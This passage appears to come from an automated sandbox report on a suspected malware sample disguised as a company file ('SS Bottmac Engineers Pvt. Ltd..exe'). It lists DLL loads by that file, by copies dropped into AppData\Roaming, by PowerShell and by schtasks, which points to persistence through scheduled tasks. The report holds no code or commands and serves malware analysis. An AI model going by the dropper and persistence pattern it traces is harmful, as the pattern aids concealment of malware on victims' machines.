              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
